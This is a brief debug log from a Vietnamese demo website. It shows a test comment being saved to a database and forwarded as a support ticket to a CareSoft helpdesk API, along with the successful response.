--------------------
-------Database-----
Send post params: {"postID":"7439","ticketID":"107170","page_name":"Test Com","page_url":"https:\/\/demo.dienthoaivui.com.vn\/test-com\/","author":"\u0110\u1ee9c","phone":"0986332295","mail":"admin@ducdoblog.com.cc","content":"ahihihihiyhihih m\u01a1 \u0111\u00ea","parent":"149","ip":"118.69.109.93","type":"post","status":"1","is_admin":0}
--------------------
-------CareSoft-----
Send post params: {"ticket":{"ticket_subject":"Test Com #150","username":"\u0110\u1ee9c","ticket_comment":{"body":"#150\n ahihihihiyhihih m\u01a1 \u0111\u00ea<br\/> https:\/\/demo.dienthoaivui.com.vn\/test-com\/","is_public":1},"email":"admin@ducdoblog.com.cc","ticket_status":"open","phone":"0986332295","ticket_priority":"urgent","service_id":"9500001"}}
Result: Gửi thành công - {"code":"ok","ticket":{"updated_at":"2019-05-18 15:15:59","ticket_subject":"Test Com #150","ticket_no":75288,"created_at":"2019-05-18 15:14:45","ticket_id":107170}}
--------------------
